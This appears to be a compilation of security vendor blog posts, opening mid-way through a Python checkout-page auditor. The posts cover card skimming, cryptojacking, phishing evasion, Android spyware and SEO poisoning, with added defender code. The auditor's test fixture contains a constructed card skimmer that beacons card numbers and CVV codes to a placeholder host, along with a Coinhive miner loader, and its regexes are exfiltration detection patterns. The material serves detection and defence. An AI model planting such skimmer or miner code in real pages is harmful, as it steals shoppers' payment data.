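SENDS = re.compile(r"new\s+Image\b|\.src\s*=|fetch\(|XMLHttpRequest|sendBeacon|new\s+WebSocket")
# Miner indicator taken from the Coinhive case described above.
MINER = re.compile(r"coinhive", re.I)


def audit_page(html: str, page_url: str, allowlist=()) -> list:
    """Return findings for a checkout page: third-party scripts, miner
    references, and inline code that both reads form data and sends it."""
    page_host = urlparse(page_url).netloc.lower()
    allowed = {h.lower() for h in allowlist}
    collector = ScriptCollector()
    collector.feed(html)
    findings = []

    for src in collector.external:
        host = urlparse(src).netloc.lower()
        if MINER.search(src):
            findings.append({"kind": "cryptojacking", "where": src})
        elif host and host != page_host and host not in allowed:
            findings.append({"kind": "third-party-script", "where": src})

    for body in collector.inline:
        snippet = " ".join(body.split())[:80]
        if MINER.search(body):
            findings.append({"kind": "cryptojacking", "where": snippet})
        elif READS.search(body) and SENDS.search(body):
            findings.append({"kind": "skimmer", "where": snippet})
    return findings


# Constructed checkout page: a first-party script, a CDN include, a miner
# include plus its loader, and an inline Image-beacon skimmer. Placeholder hosts.
SAMPLE_HTML = """<html><body>
<form id="payment"><input name="cc"><input name="cvv"></form>
<script src="/static/checkout.js"></script>
<script src="https://cdn.example-cdn.net/jquery.min.js"></script>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var m = new CoinHive.Anonymous('SITE_KEY'); m.start();</script>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var f = document.forms[0], i = new Image();
  i.src = 'https://stats-collector.invalid/c.php?d=' +
          encodeURIComponent(f.cc.value + '|' + f.cvv.value);
});
</script>
</body></html>"""

if __name__ == "__main__":
    for f in audit_page(SAMPLE_HTML, "https://shop.example/checkout"):
        print("%-18s %s" % (f["kind"], f["where"]))
```

The allowlist is where the real work is: a payment page should load scripts from a short, known set of hosts, and anything outside that set on the page that collects card numbers deserves a look even when it does not match the skimmer pattern.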
Conclusion

The ThreatLabZ team at Zscaler works diligently to ensure that customers do not fall victim to the malicious activities described above. Users should be cautious and protect themselves by reviewing our security checklist, particularly during the shopping season:

- Check the authenticity of the URL or website address before clicking on a link
- Ensure online retailers and banking sites use HTTPS/secure connections
- Do not use unsecured public Wi-Fi for shopping
- Inspect the source of emails with enticing shopping deals; be wary of any suspicious attachments
- Steer clear of unofficial mobile application stores
- Use two-factor authentication whenever possible, especially on sensitive accounts such as those used for banking
- Always ensure that your operating system and web browser are up to date and have the latest security patches installed
- Use browser add-ons like Adblock Plus to block popups and potential malvertisements
- Use browser add-ons like No Coin to block a site's attempts to use your computer for cryptocurrency mining
- Back up your documents and media files
- Review the Identity Theft Guide and FAQs from the Federal Trade Commission
- Review the National Cybersecurity and Communications Integration Center's (NCCIC) Holiday Scams and Malware Campaigns warning and recovery actions message

Wishing you all a very happy, healthy, and safe Thanksgiving!

Zscaler™, Zscaler Internet Access™, Zscaler Private Access™, ZIA™ and ZPA™ are either (i) registered trademarks or service marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States and/or other countries. Any other trademarks are the property of their respective owners.
Categories: Security Posts

Zscaler ThreatLabZ Phishing Roundup

Zscaler Research - 9 min 32 sec ago
Phishing is an attempt to steal personally identifiable information, such as Social Security numbers, credit card details, date of birth, and other sensitive data. Typically, phishing targets a user with an email containing a link to a website that imitates a legitimate website the user might visit. As users have become savvier about their online practices, the developers of phishing sites have upped their game, too: many of the sites we see are carefully designed to look like the sites they’re imitating, and clever tactics are used to trick potential victims.

In this blog, we will share some insights from phishing activities blocked across the Zscaler™ cloud. We’ll cover the top brands and categories we are seeing targeted by phishing campaigns, recent examples of campaigns, and some of the tactics being used by threat actors to be more successful.

Types of phishing

There are different types of phishing activity, including:

- Spear phishing, in which the phishing attempt is targeted against certain organizations or individuals working for specific companies.
- SMiShing, also known as SMS phishing, which involves a message (SMS communication) that targets victims and entices them to click on URLs hosting phishing websites.
- Whaling, in which threat actors target high-profile individuals, such as senior executives in a company, most often to gain internal company information that is not public knowledge.

What brands are being targeted?

While it might be easier to spoof the sites of lesser-known brands, where differences wouldn’t be so apparent, the actors trying to steal personal information need to impersonate popular sites for maximum return, raising the odds of snaring a victim. Their phishing sites often feature the biggest brands, and they use a variety of tricks to evade detection, which we’ll describe in this report. Some of the most commonly targeted brands we’ve seen in the recent phishing campaigns can be seen below:

Fig. 1: Top phished brands in the Zscaler Cloud

Microsoft tops the list partly because of Microsoft’s multiple enterprise web properties, such as OneDrive, Office 365, and Outlook Web Access, among others, being targeted by the threat actors. Microsoft was followed by Facebook and PayPal in the list. In addition to the known brands, it was interesting to see phishing campaigns targeting travel visa portals (Canadian Visa and Australian Visa, for example) included in our top five most targeted brands. The attackers in this case were most likely interested in phishing for sensitive immigration information, such as passport details, date of birth, and national identification numbers.

The top five most commonly targeted application categories we saw in the recent phishing campaigns include:

- Communications (41.4%)
- Social media (18.3%)
- Finance (16.7%)
- Travel (12.4%)
- Dating (3.4%)

Fig. 2: Top phished site categories in the Zscaler Cloud

Delivery of phishing content

The majority of phishing campaigns start with an email or message containing a link to a site hosting the phishing page. If the user clicks on the link, the phishing page is delivered. We have seen an increasing number of phishing attempts being delivered over an encrypted channel (HTTPS). We believe this increase is most likely due to the availability of domain validated (DV) SSL certificates. These certificates are easy to obtain from free SSL cert providers like Let's Encrypt as well as commercial Certificate Authorities. Multiple commercial CAs also offer free DV SSL certs with shorter validity periods, with the expectation that the client will purchase a paid certificate once those expire. However, these offers provide a safe haven for cybercriminals, who often leverage these short-term certs to deliver malicious content and then discard them. About 65 percent of all phishing content we’ve seen in the past three months was over HTTP and the remaining 35 percent was over HTTPS. This represents a 300 percent increase in phishing content being delivered over HTTPS since 2016.

A look at recent phishing examples

Chalbhai campaign

We continue to see a known phishing campaign using the tag chalbhai in its form statements. This campaign has been targeting users with phishing pages that mimic American Express, Microsoft Office, and Adobe; seasonal campaigns like fake IRS and TurboTax webpages during tax season; and, more recently, holiday shopping season pages. A sample of this tag being used on a Wells Fargo phishing page is shown below.

Fig. 3: Chalbhai tag shown in the source code

Usage of compromised sites

Below is an example of a legitimate site that has been compromised, with the attacker hosting multiple phishing sites on the compromised domain. The screenshot shows the open directory found on the compromised web server.

Fig. 4: Compromised web server

The two screenshots that follow are phishing pages designed to look like pages of legitimate websites, including a single sign-on page for Abilene Christian University and a Bank of America page.

Fig. 5: Faked SSO for Abilene Christian University

Fig. 6: Faked Bank of America page

If the user falls for these phishing pages, the credentials are harvested and posted to the attacker-controlled location.

Evasion and Anti-Analysis Techniques

1. Use of images instead of content

The phishing websites are usually cloned copies of the legitimate sites. The difference in the case of Bank of America is that the faked page is almost entirely made up of a single image with a simple credential login form. This helps to evade engines running heuristics on the page source code.

2. Preventing access to page source

A simple anti-analysis technique used by scammers is disabling the right-click functionality to prevent users from checking the page source. This can be seen in the phishing page below, which is pretending to be an Adobe Online document.

Fig. 7: Malicious Adobe Online document

3. Filtering based on user IP address, host names, and User-Agent strings involved in the request

We’ve also observed malicious actors trying to fingerprint requests and serve phishing content based on the user’s IP address, host name, and User-Agent. We can see an example in the snippet below, where the attacker is maintaining a list of IP addresses, hostnames, and User-Agent strings known to be used by security researchers and analysts when attempting to retrieve the phishing page. If any request to the phishing site arrives from one of the known IP addresses or hostnames, or has one of the listed User-Agent strings, then the phishing page will not be served. This tactic helps the attacker keep the phishing page content undetected for a longer duration.

Fig. 8: Banned source IP addresses, hostnames, and User-Agent strings

4. Exfiltrating information as an image instead of content

We have also seen multiple instances of phishing attacks that prompt users to verify their identity by asking them to upload a copy of their ID, as shown in the code below.

Fig. 9: Coded to prompt users to upload identification card

The sensitive user information in this case is being stolen in the form of an image, which will bypass content-based data loss prevention engines.

5. Encrypted phishing

We have also seen a few phishing pages that use encryption to hide the source code in an attempt to evade detection by security engines. One such example, for a faked PayPal page, is shown below.

Fig. 10: Encrypted source code for a phishing page

6. Punycode-based hostnames

We have also seen attempts to use punycode, in which threat actors use homograph techniques to construct a URL that looks like a legitimate URL but uses characters from non-English character sets to trick the user. (See our Punycode blog for examples of this technique.) This technique makes it difficult for reputation-based engines to keep up.
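A defender-side check for the punycode evasion described above, added here as an example (it is not code from the original post): each xn-- label is decoded with the standard-library punycode codec, the scripts in the decoded label are listed, and a small look-alike table maps Cyrillic and Greek letters to the ASCII letters they resemble. If every non-ASCII letter in a label maps to an ASCII look-alike, the hostname is reported as a homograph candidate together with the ASCII name it renders as; a genuine IDN such as a German umlaut domain is reported as an IDN, not a homograph. The sample hostnames and the confusables table are constructed for this example; a production check would use the full Unicode confusables data.

```python
"""Decode punycode (IDN) hostnames and flag likely homograph look-alikes.

Added example for the punycode evasion above; not the post's own code.
The sample hostnames and the small confusables table are constructed here.
"""
import unicodedata

# Constructed look-alike table: non-Latin letters that render like ASCII letters.
# Real tooling should use the full Unicode confusables.txt data instead.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u0455": "s", "\u0456": "i", "\u0458": "j",
    "\u04bb": "h", "\u04cf": "l", "\u0501": "d", "\u051b": "q", "\u051d": "w",
    "\u03b1": "a", "\u03bf": "o", "\u03c1": "p", "\u03bd": "v", "\u03b9": "i",
}

# Constructed sample input for the demo.
SAMPLE_HOSTS = [
    "www.example.com",       # plain ASCII, nothing to decode
    "xn--80ak6aa92e.com",    # all-Cyrillic label that renders like "apple"
    "xn--pple-43d.com",      # mixed script: Cyrillic "a" followed by Latin "pple"
    "xn--mnchen-3ya.de",     # legitimate German IDN (muenchen with an umlaut)
]


def decode_label(label):
    """Decode one xn-- label with the stdlib punycode codec; other labels pass through."""
    if label.lower().startswith("xn--"):
        try:
            return label[4:].encode("ascii").decode("punycode")
        except UnicodeError:
            return label  # malformed ACE label: keep the raw xn-- form visible
    return label


def scripts_of(label):
    """Scripts present in a label, read from the first word of each letter's Unicode name."""
    return {unicodedata.name(ch, "UNKNOWN").split(" ")[0] for ch in label if ch.isalpha()}


def skeleton(label):
    """Replace known confusable letters with the ASCII letter they resemble."""
    return "".join(CONFUSABLES.get(ch, ch) for ch in label)


def classify_host(host):
    """Classify a hostname as ascii, idn (genuine non-ASCII) or homograph candidate."""
    labels = host.lower().split(".")
    decoded = [decode_label(lab) for lab in labels]
    kind, resembles, mixed = "ascii", None, False
    for lab in decoded:
        if lab.isascii():
            continue
        kind = "idn"
        if len(scripts_of(lab)) > 1:
            mixed = True  # Latin and another script in one label is itself a red flag
        skel = skeleton(lab)
        if skel != lab and skel.isascii():
            # Every non-ASCII letter maps to an ASCII look-alike: reads as that name
            kind = "homograph"
            resembles = ".".join(skeleton(x) for x in decoded)
    return {"host": host, "decoded": ".".join(decoded), "kind": kind,
            "resembles": resembles, "mixed_script": mixed}


def triage(hosts=SAMPLE_HOSTS):
    """Classify each hostname in the list."""
    return [classify_host(h) for h in hosts]


if __name__ == "__main__":
    for result in triage():
        print(result)
```

The decoded form is what the address bar renders, so the `resembles` value is the string a user would believe they are visiting; feeding it to a brand or allow-list comparison is how a reputation engine catches the look-alike even though the raw xn-- hostname has no history.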
Anatomy of Scam Page creation

Let’s now take a look at how typical scam web pages are created to perform financial fraud and phish for sensitive information. Attackers copy website templates to create scam websites, making the scam pages look very similar to the original, as seen below:

Fig. 11: Scam websites are built using templates to mimic legitimate sites

Most of the time, the fakes include small changes to evade detection, like changing the names of the doctors on the following page, but the site is otherwise identical.

Fig. 12: Small changes that help attackers evade detection

The scam websites even have live chat support, which responds to queries and guides users through the payment process. The photos of doctors were taken from a royalty-free stock photography database. When checking the source code in the Fig. 11 example, we found that the contents were copied from a legitimate site, santabarbaraherbclinic[.]com, and we can see the timestamp in the screenshot below.

Fig. 13: Source code in scam website shows copied content from a legitimate site

Conclusion

Phishing attacks have been on the rise over the past few years. As end users become more vigilant against clicking suspicious links, attackers have upped the ante by evolving the way in which phishing content is delivered, as well as the tactics used to keep phishing pages undetected for longer periods. While in this blog we focused mainly on commodity phishing and scam pages, some of the tactics mentioned here are also commonly seen in many targeted phishing campaigns (spear phishing, Business Email Compromise, etc.). Zscaler™ ThreatLabZ actively tracks and ensures coverage against phishing campaigns.
Categories: Security Posts

Soulmate: A Dating App That Spies On You

Zscaler Research - 9 min 32 sec ago
During a recent hunt for malware, the Zscaler™ ThreatLabZ team came across a piece of spyware disguised as an Android app and hosted on Google Play, Google’s official Android app store. The app portrays itself as a partner matching app called Soulmate, designed to help you find (and keep tabs on) your True Love. But the app has capabilities beyond those described by the developer, like snooping on incoming and outgoing calls, intercepting SMS messages, stealing contacts, tracing current and last-known location, and more.

Fig 1: Soulmate app on Google Play

Zscaler notified Google about the presence of this app and it was immediately taken down from Google Play.

App Details

Name: Soulmate
Package Name: com.kikde.soulmate
Hash: 28be1a661e375547df52e7b544c2745b
Size: 8.6M
Installs: 50+
Offered By: Kikde App

Detailed Information

As soon as the app is started, it greets the user with a splash screen and some basic setup activities. It also asks to register itself as the default keyboard. By doing so, it can log every keystroke entered by the user.

Fig 2: Initial activities

During our analysis, we received a 404 error from the app’s command and control (C&C), which may have been a ploy or may have simply meant that the services were not available at the time of analysis. We decided to look further and found several permissions being requested that did not align with the name or purported function of the app. The screenshot below shows the list of permissions requested by the app.

Fig 3: Android permissions

Once the setup was done, the app registered and started some services and broadcast receivers. Android services are components that can run in the background without user interaction, and the Android BroadcastReceiver is a component that can be made to trigger when certain system events occur, such as presenting an alert when the battery is low. This spyware registers a broadcast receiver named ReciverHandler.
This receiver is registered to execute upon the following events:

- Outgoing Call
- Connectivity Change
- Change of Phone State
- Package Added/Removed/Installed
- Power Disconnect/Connect
- SMS Received
- SMS Sent
- Boot
- Screen ON/OFF

Depending upon which of the above events occurs, the spyware is designed to trigger particular services. We found that this app used the following Android services:

- Call Record Service
- Record Service
- Geofence Service
- App Location Service
- MyKeyboard Service
- Clipboard Monitor Service
- Basic Info Upload Service
- File Upload Service
- Upload Service

Call Record Service and Record Service are responsible for recording the victim’s calls. The screenshot below shows this functionality.

Fig 4: Call recording

Geofence Service and AppLocation Service are responsible for fetching the victim's location. A snippet from the service can be seen below:

Fig 5: Location tracing

Clipboard Service is responsible for stealing everything that is copied/pasted by the victim. The app creates a file named clipboard.txt in which it stores all copied data. Copied data is also uploaded to the server, as shown in the following screenshot.

Fig 6: Clipboard service

The app also tries to steal the victim's SMS messages, as shown below:

Fig 7: SMS stealing

Once every detail is collected, the data is saved in a local database and then sent to the C&C. These functions are achieved with the BasicInfoUpload Service, FileUpload Service, and Upload Service.

As we researched package names, app certificates, and statically collected data, we discovered that this spyware had been uploaded to Google Play in the past with the name Soulmate (Beta) and a different package name (com.perfekt.ats.perfektsoulemates). It was taken down immediately. We also came across a lot of advertising for spyware apps that enable users to spy on loved ones. Some of these ads are shown below.
Fig 8: Spyware advertisements

These advertisements took us to the developer's official website, apps[.]kikde[.]com. KikDe promotes itself as a company that provides services to develop websites, Android apps, iOS apps, Windows apps, SEO (Search Engine Optimization), and more. On the KikDe website, we found references to another company called American Transportation System LLC. Tracing this company, we ended up on a third-party website that was still hosting some of its apps. All these apps contained the word “perfekt” in their titles, and it soon became clear that the earlier app named Soulmate was uploaded by this same entity. Other apps by this developer can be seen in the screenshot below, along with comparisons to the same apps with different names on Google Play:

Fig 9: Third-party vs. Google Play apps

Other apps from this developer were also highly suspicious. For example, Kikde OTP Monitor could be used for forwarding an OTP (One Time Password) to another mobile device. Kikde Secure+ Keyboard was more of a keylogger. We are continuing our analysis of these apps and will report our findings.

Conclusion

It is always advisable to stay away from “spying” apps. They do have some legitimate use cases, such as parents keeping track of the whereabouts of their children. But as we’ve seen with Soulmate, users can’t be sure of what is happening under the hood, and the user who is spying may actually be the one who is spied upon. When considering apps to download, users should always exercise caution. Some apps might have good ratings and favorable reviews, but that is not reason enough to trust them, because such ratings and reviews can easily be supplied by the attackers themselves using other identities.

Zscaler protects users from spyware and other malicious apps that call out to C&C servers.
Categories: Security Posts

Ubiquitous SEO Poisoning URLs

Zscaler Research - 9 min 32 sec ago
SEO poisoning, also known as search engine poisoning, is an attack method that involves creating web pages packed with trending keywords in an effort to trick search engines into giving them a higher ranking in search results. There are different ways to implement SEO poisoning, such as keyword stuffing, the use of hidden text, and cloaking, among others. In addition to manipulating search ranking, SEO poisoning is widely used to redirect users to unwanted applications, phishing, exploit kits and malware, porn, advertisements, and so on.

The ThreatLabZ research team has been actively tracking SEO poisoning campaigns; in this blog, we will share some recent examples and an analysis of the techniques used.

“Midterm elections” campaign

Attackers often use holidays and other timely occasions that are likely to generate a lot of search interest. For this analysis, we chose to focus on the upcoming U.S. election. In the following screenshot, there are three SEO-poisoned URLs in the Google search result for the keyword “midterm elections.”

Fig. 1: SEO poisoned URLs in Google search

After about a month of looking at this “midterm elections” SEO poisoning campaign, we found more than 10,000 compromised websites with more than 15,000 keywords, and we continue to find hundreds of newly compromised sites involved in this activity every day.

Use of multiple redirects

Let’s take a look at some specific URLs generated by the following SEO poisoning campaign:

websitedukkani[.]com/enj0qnh/godev3a.php?snlhpyouf=midterm-elections-2018-polls

The Google cache for the above URL is shown below, and you can see that the Google crawler got a junk page loaded up with many uses of the keyword “midterm elections.”

Fig. 2: Google crawler loaded with keywords

But when we browsed this URL in Chrome, we discovered that it may be redirected to this page:

Figure 3: SEO poisoning landing page example

We say “may” because the redirected website is different each time. We also noted that it goes through a series of redirects before landing on the final page, as shown in figure 4 below. This is just one of the many measures that cybercriminals are using to deter automated crawlers from adding detection for the landing pages. In our example, the user goes through two redirects via the “302 Found” response code before getting to a real page, as shown in figure 3:

Redirect URL #1 - 5[.]45[.]79[.]15/input/?mark=20180314-landlordpeace.com/0fuq&tpl=9&engkey=how+to+login+to+zscaler

Redirect URL #2 - www[.]hitcpm[.]com/watch?key=027ed88f05536b6c1a41df968c0abb52

Figure 4: The web page content of the last redirect

The final landing page that the user sees will be different every time; in our case the user was served the following web page:

best2017games[.]com/bestgames/playtime/6a6d637637c06de629eb725d6c5c34e1/index.php?country_code=US&p1=http%3A%2F%2Fadsfxs.pro%2Fclick%2F05e45367-502f-4558-8e24-9235a5169358%3Fclickid%3DVjN8MTQyNjk4NDh8MTE0NTYyNXwxNTQ2MzZ8MTUyMTA2NzI3M3wyN2RkMDE5MS0xMThjLTRhNWItYjJiYy1mYWI0Nzk2ZTRjMzJ8NzEuMTk3LjIzMS45NXwzfDIwZTdkNzQ3Mzk3MmU5MTllZDQ2NDY0NTI3ZmE0OTcz%26zoneid%3D14269848

The multiple redirect model provides a perfect platform for a MaaS (Malware-as-a-Service) infrastructure, as it shields the final landing page from automated security crawlers.

Cloaking technique

The attackers are leveraging cloaking techniques whereby the end user is served different content depending on the HTTP headers involved in the web request. We noticed three distinct responses in some of the recent campaigns:

- Crawler view: The SEO URL will return a web response that is more catered towards poisoning the search engine results for the relevant search term. This will make the URL appear higher in the search result.
- Browser or user view: The SEO URL in this case will lead the user through a series of redirects before a final landing page, dependent upon the campaign. The attacker distinguishes between user view and crawler view by inspecting the User-Agent HTTP header of the request. If the User-Agent string belongs to a well-known web browser, then user view content is served.
- Referer view: The SEO URL in this case will serve different content to the end user, depending on the URL set in the Referer HTTP header.

Without cloaking

Without the use of cloaking, the content fetched by the search engine crawler (“crawler view”) and by the direct user (“direct view”) will be identical. However, the SEO page will have scripts to detect whether it is an actual user loading the content in a web browser, in which case the user will be redirected to the final landing page containing the malicious content. Here is an example of an SEO campaign where cloaking is not being used:

URL: tucuerposiente[.]cl/forum/070sxjj.php?bbhb=excel-vba-cells-function

The crawler view and direct view for this SEO URL return identical content. The SEO page in this case will redirect to a final landing page based on the user’s action, such as mouse movement or rendering of the page in the web browser. The crawler will not see the landing page redirect, as there is usually no user interaction or browser rendering involved. Below is a view of what happens when a user browses an SEO-poisoned URL that is not leveraging cloaking techniques. The user will see a webpage as well as a busy icon on the browser tab indicating additional background activity. This activity is leading the user to the final landing page in the background, as shown in this screen capture from Fiddler (a free web request debugging tool).

Figure 5: An SEO poisoned URL without cloaking leads user to landing page

The attacker is leveraging a specially crafted CSS (Cascading Style Sheet) to perform a redirect from the user’s browser. In CSS, the url() value can be used to set the background image. The figure below shows the typical usage of url() (taken from w3schools.com).
Figure 6: URL property

But if you don’t give any parameter to url(), writing url() instead of url(“URL”), the browser will load the parent page again. During the second load, however, the Referer HTTP header is set to the parent URL itself. This is the reason there are two requests to the same URL in Fiddler. It is important to note that the malicious content will be served on the second request, in which the Referer HTTP header is set to the expected URL. The figure below shows the CSS code snippet used in the SEO page. The line “background-image: url()” will cause the page to reload.

Figure 7: CSS code snippet in the SEO page

The second request will load the malicious code, as shown in the image below.

Figure 8: Malicious code

SEO URL generation

Let’s take a look at a typical SEO URL structure seen in SEO poisoning campaigns:

SEO URL: sbtechsiteleri[.]com/docs/bmfns7.php?gneo=access-vba-form-load

We can divide this URL into several parts:

Host: www.sbtechsiteleri[.]com
URI path: docs
PHP page file: bmfns7.php
Parameter: gneo
Search keywords: access-vba-form-load

The campaign uses different parameters to generate URLs. We have found hundreds of unique parameters; jtjd and wanh are two examples of parameters shown in the screenshot below. From the search result in the screenshot, we can reasonably guess there are hundreds of millions of SEO URLs generated for these two parameters.

Figure 9: URLs generated

SEO web page generation

Although we don’t have access to the backend code used to generate the SEO webpages, we can draw some insights into the generation process based on our analysis of several pages involved in this activity:

1. Pick up the keywords from the “search keywords” part of the URL and search for them in a search engine
2. Collect the responses that contain the keywords
3. Generate a final response containing specific strings from the collected responses

The Google cache of the webpage www.sbtechsiteleri[.]com/docs/bmfns7.php?gneo=access-vba-form-load:

Figure 10: Example of Google cache

The first sentence, “I am fairly new to Access,” can be found in several URLs. The second sentence, “Programming Microsoft Access with VBA can be a lot easier if you know the keyboard shortcuts for the most common commands and tasks and the” is from this site:

Figure 11: Example of site found

Following that sentence, you can see, “If you want to set the RecordSource of another form, you must ensure the other form is open first,” which is from this website:

Figure 12: Example of sentence found at site

All three of the above examples are for the keyword “access.”

Conclusion

SEO URLs redirect users to different targets. We saw two modes of operation in the pages that we analyzed:

- The users go through a series of redirects to reach the final landing page.
- The users are redirected to a MaaS (Malware-as-a-Service) platform, which starts another redirection chain leading to the final landing page.

Here are the top web categories to which the final landing page sites belonged:

1. Adult and pornographic websites
2. Internet services sites; in this case, the SEO campaign's purpose is advertising
3. Politics and religion, an example of which is shown below
4. Exploit servers leading to adware/malware payloads

On average, we see over 3,000 new and unique SEO poisoned URLs every day. ThreatLabZ is actively tracking this threat and will continue to ensure coverage for Zscaler customers.
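Two defender-side checks that follow from the sections above, added here as an example (not the post's own code): the first splits a URL into the host, URI path, PHP page file, parameter and search keywords listed under "SEO URL generation", rejecting URLs that do not fit the campaign's shape; the second tests a URL for the cloaking and Referer tricks by requesting it as a crawler, as a browser, and as a browser whose Referer is the page itself (the condition the empty `url()` reload creates), then comparing status, redirect target and body hash across the three views and scanning every body for `url()`. The `fetch` callable, the responses in `constructed_fetch`, and the `.invalid` redirector host are constructed stand-ins for a real HTTP client and server; the defanged sample URLs are the ones quoted in the post.

```python
"""Triage helpers for SEO-poisoned URLs.

Added example for the "Cloaking technique", "Without cloaking" and "SEO URL
generation" sections above; not the post's own code.  The fetch function and
the responses it returns are constructed stand-ins for a real HTTP client and
for an SEO page; the redirector host name is a placeholder.
"""
import hashlib
import re
from urllib.parse import parse_qsl, urlsplit

# Campaign URL shape from the post: host / uri-path / <random>.php ? <param> = <kw-kw-kw>
PAGE_RE = re.compile(r"^[a-z0-9]{4,10}\.php$")
PARAM_RE = re.compile(r"^[a-z]{3,12}$")
EMPTY_URL_RE = re.compile(rb"url\(\s*\)")  # CSS "background-image: url()" self-reload trick

CRAWLER_UA = "Googlebot/2.1 (+http://www.google.com/bot.html)"
BROWSER_UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/70.0 Safari/537.36"


def parse_seo_url(url):
    """Split a (possibly defanged) URL into the parts the post lists; None if it does
    not fit the campaign pattern."""
    url = url.replace("[.]", ".")
    if "://" not in url:
        url = "http://" + url
    parts = urlsplit(url)
    segments = parts.path.strip("/").split("/")
    page = segments[-1]
    query = parse_qsl(parts.query, keep_blank_values=True)
    if not PAGE_RE.match(page) or len(query) != 1:
        return None
    param, keywords = query[0]
    if not PARAM_RE.match(param) or "-" not in keywords:
        return None
    return {
        "host": parts.hostname,
        "uri_path": "/".join(segments[:-1]),
        "page": page,
        "parameter": param,
        "keywords": keywords.split("-"),
    }


def _fingerprint(status, headers, body):
    """Compact view of a response: status, redirect target, hash of whitespace-normalised body."""
    body = re.sub(rb"\s+", b" ", body)
    return (status, headers.get("Location"), hashlib.sha256(body).hexdigest()[:16])


def detect_cloaking(url, fetch):
    """Request url as a crawler, as a browser, and as a browser that arrived from url
    itself (the Referer the CSS reload sets); report which views differ.
    fetch(url, headers) must return (status, response_headers, body_bytes)."""
    views = {
        "crawler": {"User-Agent": CRAWLER_UA},
        "browser": {"User-Agent": BROWSER_UA},
        "referer": {"User-Agent": BROWSER_UA, "Referer": url},
    }
    seen, bodies = {}, []
    for name, headers in views.items():
        status, rhdrs, body = fetch(url, headers)
        seen[name] = _fingerprint(status, rhdrs, body)
        bodies.append(body)
    findings = []
    if seen["crawler"] != seen["browser"]:
        findings.append("user-agent cloaking")
    if seen["browser"] != seen["referer"]:
        findings.append("referer cloaking")
    if any(EMPTY_URL_RE.search(b) for b in bodies):
        findings.append("css empty url() self-reload")
    return {"views": seen, "findings": findings}


def constructed_fetch(url, headers):
    """Constructed stand-in for an SEO page: keyword-stuffed text for crawlers, a
    self-reloading CSS page for browsers, and a 302 once the Referer is the page itself."""
    if "Googlebot" in headers.get("User-Agent", ""):
        return 200, {}, b"<html><body>midterm elections 2018 polls midterm elections ...</body></html>"
    if headers.get("Referer") == url:
        return 302, {"Location": "http://redirector.invalid/input/?tpl=9"}, b""
    return 200, {}, b"<html><head><style>body{background-image: url()}</style></head><body></body></html>"


def triage(url, fetch=constructed_fetch):
    """Parse the URL and run the three-view cloaking check against it."""
    return {"parts": parse_seo_url(url), "cloaking": detect_cloaking(url, fetch)}


if __name__ == "__main__":
    # Defanged URL quoted in the post; it is refanged only inside parse_seo_url.
    print(triage("sbtechsiteleri[.]com/docs/bmfns7.php?gneo=access-vba-form-load"))
```

Against a live server, `fetch` would wrap an HTTP client with redirects disabled so that the 302 target is captured rather than followed; comparing fingerprints rather than raw bodies keeps the check stable when the keyword-stuffed response varies slightly between requests.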
Indicators of Compromise

The list of the redirectors used by this campaign and some IOCs for PHP files and ZIP files can be found here. If you find these PHP or ZIP files on your website, it is likely that your website has been compromised.
Categories: Security Posts

Why you shouldn't trust "safe" spying apps!

Zscaler Research - 9 min 32 sec ago
During a recent malware hunt, the Zscaler™ ThreatLabZ research team came across a suspicious Android app on Google Play, the official Google app store, named SPYMIE. SPYMIE portrays itself as an Android-based key logger designed for parents to track the cell phone activities of their children. Given the popularity of such apps, it has become common practice for app creators to promote spying capabilities as parental control features. However, SPYMIE packs a little something extra with the parental controls.

Basically, SPYMIE is an Android-based keylogger that has the ability to hide itself and start recording everything the user tries to access. Ideally, keystroke logging is best achieved with keyboard-based apps, but this app uses Android's Accessibility Services to perform its functions. The app author also has included their email address in the code of the app, which allows them to receive all the information that the app is collecting, making those using the app vulnerable to having their personal information stolen.

Before the app was removed from Google Play, its description was as follows:

“SPYMIE: Key logger is specially designed for parents to track the cell phones of your children. It will also help you when someone friends ask you for your phone for ten minutes but you don’t trust on it. So what you have to do you only have to on the SPYMIE: Key Logger. So whenever the friends return phone to you, you can check all the activities done by your friend. It records all the activities that are done on your phone. All activates are send to your mobile phone via email.

"For parents what they have to do, you just install the app in your children phone. Hide the icon. Later on you have check all the activities done by your children in the whole day."

Zscaler notified Google about the presence of this app and it was immediately removed from Google Play.
App Details

Name: SPYMIE: Key Logger
Package Name: com.ant.spymie.keylogger
Hash: 8e32ce220e39ba392c9e15671a32854b
Size: 5.5M
Installs: 10,000+

Technical Details

As soon as the app is installed, it shows basic setup activities asking the user for an email ID, as shown in the screenshot below.

Fig. 1: SPYMIE initial activities

Once the introduction is complete, the app asks for runtime permission for managing outgoing calls. The reason for asking for this permission is related to the app's hiding functionality. As shown in the screenshot below, if the user enables the hiding feature, the app then asks for a secret PIN to open the app. The user can then open the app by firing up the phone dialer and entering the PIN. This is the main reason for asking for permission related to phone calls.

Fig. 2: Hiding functionality

After further analysis, we found that the app contains a default PIN as well. Dialing **00## would open this keylogger app. The screenshot below shows the code snippet for this functionality.

Fig. 3: Default hard-coded PIN

Once the basic setup is done, one can turn on the spying feature. To enable spying on a user's activities, this app uses Accessibility Services. This feature was designed to assist users with disabilities in using Android devices and apps. The screenshot below displays the functionality in action:

Fig. 4: Enabling Accessibility Services

Once Accessibility Services is enabled, the app starts logging every activity performed by the user/victim. The snapshot below shows the code responsible for logging user actions along with keystrokes and storing them in a file named SpyLogger.xml.

Fig. 5: Storing user/victim's activities

In order to see the functionality in action, we tried running the app in a controlled environment. At first, we opened Gmail and tried composing a sample email.
As shown in the screenshot below, almost every activity, from opening the Gmail app (left side) to composing the body of the email, was logged (right side).

Fig. 6: Gmail logging

In another test, we fired up Paytm and tried logging in. The right side of the screenshot below shows how every action was logged.

Fig. 7: Paytm login

The above screenshots display the logs visible through Android's logcat command, but behind the scenes, all this data is being written to a file named SpyLogger.xml.

Looking from another perspective, the app has a serious vulnerability which, according to OWASP, can be categorized as Insecure Data Storage. Any random app with the READ_LOGS permission can read logs presented by Android. In this scenario, all sensitive data is being written to log entries, and every piece of sensitive data is at risk.

